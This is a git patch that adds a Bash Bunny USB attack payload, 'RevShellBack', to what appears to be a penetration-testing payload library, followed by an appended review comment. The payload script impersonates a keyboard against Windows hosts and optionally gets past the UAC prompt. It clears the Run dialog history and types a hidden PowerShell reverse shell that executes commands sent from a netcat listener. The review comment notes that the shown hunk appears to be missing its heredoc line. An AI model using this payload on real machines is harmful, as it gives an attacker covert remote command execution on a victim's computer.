From c58e10dcabede37f6f49c9da018986ae02439f2f Mon Sep 17 00:00:00 2001
From: Andre Santos
Date: Wed, 25 Oct 2017 21:06:13 +0100
Subject: [PATCH] Add RevShellBack payload (#265)
---
.../library/execution/RevShellBack/README.md | 32 ++++++++++
.../execution/RevShellBack/payload.txt | 62 +++++++++++++++++++
2 files changed, 94 insertions(+)
create mode 100644 payloads/library/execution/RevShellBack/README.md
create mode 100644 payloads/library/execution/RevShellBack/payload.txt
diff --git a/payloads/library/execution/RevShellBack/README.md b/payloads/library/execution/RevShellBack/README.md
new file mode 100644
index 00000000..d239cbef
--- /dev/null
+++ b/payloads/library/execution/RevShellBack/README.md
@@ -0,0 +1,32 @@
+# RevShellBack
+
+- Author: NodePoint
+- Version: 0.1.3
+- Target: Windows
+- Category: Execution
+
+## Description
+
+Set up a reverse shell and execute PowerShell/generic commands in the background from the Bash Bunny via USB ethernet.
+
+## Configuration
+
+Place powershell and/or generic commands between lines 53 and 58 (within the EOF).
+
+Need to run as admin? Set the variable ADMIN to true.
+
+Having issues obtaining a connection with the listener? Alter the time before connection attempt in NCDELAY.
+
+## STATUS
+
+| LED | Status |
+| -------- | ----------------------------------------- |
+| SETUP | Setup (attackmode, variables, networking) |
+| STAGE1 | Open CMD (bypass UAC if ADMIN is true) |
+| STAGE2 | Initiate reverse shell |
+| SPECIAL1 | Set up listener and send out commands |
+| FINISH | Finished |
+
+## Discussion
+
+https://forums.hak5.org/topic/41955-payload-revshellback/
diff --git a/payloads/library/execution/RevShellBack/payload.txt b/payloads/library/execution/RevShellBack/payload.txt
new file mode 100644
index 00000000..674c71e0
--- /dev/null
+++ b/payloads/library/execution/RevShellBack/payload.txt
@@ -0,0 +1,62 @@
+#!/bin/bash
+#
+# Title: RevShellBack
+# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
+# Author: NodePoint
+# Version: 0.1.3
+# Category: Execution
+# Target: Windows
+# Attackmodes: Ethernet, HID
+
+# Set attack mode
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+# Set variables
+GET HOST_IP
+GET TARGET_HOSTNAME
+# Netcat port number
+NCPORT=4444
+# Delay before attempting to connect to the netcat listener (ms)
+NCDELAY=200
+ADMIN=false
+
+# Setup networking
+echo 1 > /proc/sys/net/ipv4/ip_forward
+iptables -A INPUT -i usb0 -p tcp --dport $NCPORT -j ACCEPT
+iptables -t nat -A PREROUTING -i usb0 -p tcp --dport $NCPORT -j DNAT --to-destination $HOST_IP:$NCPORT
+
+# Open CMD
+LED STAGE1
+if [ "$ADMIN" = true ] ; then
+ # Bypass UAC
+ RUN WIN powershell -c "Start-Process cmd -verb runas"
+ Q DELAY 1500
+ Q ALT Y
+ Q DELAY 300
+ # Hide CMD
+ Q STRING "mode 18,1 & color FE & cd C:\ & title "
+ Q ENTER
+else
+ # Run as normal user
+ RUN WIN cmd /K "mode 18,1 & color FE & cd C:\ & title "
+ Q DELAY 150
+fi
+
+# Initiate reverse shell
+LED STAGE2
+Q STRING "powershell -W Hidden \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;Start-Sleep -m $NCDELAY;\$sm=(New-Object Net.Sockets.TCPClient('$HOST_IP',$NCPORT)).GetStream();[byte[]]\$bt=0..65535|%{0};while((\$i=\$sm.Read(\$bt,0,\$bt.Length)) -ne 0){;\$d=(New-Object Text.ASCIIEncoding).GetString(\$bt,0,\$i);\$st=([text.encoding]::ASCII).GetBytes((iex \$d 2>&1));\$sm.Write(\$st,0,\$st.Length)}\" & exit"
+Q ENTER
+
+# Attack -- commands go within EOF
+LED SPECIAL1
+nc -q 0 -l -p $NCPORT < "C:/Users/\$env:username/Desktop/reverseshelled.txt"
+\$Eject = New-Object -ComObject "Shell.Application";\$Eject.Namespace(17).Items() | Where-Object { \$_.Type -eq "CD Drive" } | foreach { \$_.InvokeVerb("Eject") }
+calc;
+Start-Sleep -m 300;Add-Type 
-AssemblyName PresentationCore,PresentationFramework;[System.Windows.MessageBox]::Show("Hello, \$env:username.\`nYour PC name is '$TARGET_HOSTNAME'.\`n\`nCheck your desktop for the file 'reverseshelled.txt'.\`nIf you have a CD/DVD drive with a disc tray, check that too.",'RevShellBack','Ok','Info')
+EOF
+
+# Done
+ATTACKMODE OFF
+LED FINISH
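Review bot: The `# Attack -- commands go within EOF` comment above `LED SPECIAL1` is the only in-file marker for the user-editable block, while the README locates that block by absolute line numbers (53 to 58), which will drift with any edit made above it; suggest widening the comment to `# Attack -- user commands go between the nc heredoc line below and the closing EOF (the README refers to this block by line number)` and dropping the numbers from the README. The header comment also does not say that the two rules under `# Setup networking` are added with `-A` on every run and are not removed before `ATTACKMODE OFF`, so a reader should expect them to accumulate across runs; a one-line comment at that point would document it. For readers of this rendering: the `-AssemblyName` fragment that begins a new line is the continuation of the preceding `Add-Type` command, not a removed line, and the hunk as shown appears to have lost the heredoc opener after `nc -q 0 -l -p $NCPORT` together with the following line (the README's "within the EOF" and the 62-line hunk count both point to it), so the `< "C:/Users/...` fragment should not be read as the committed text.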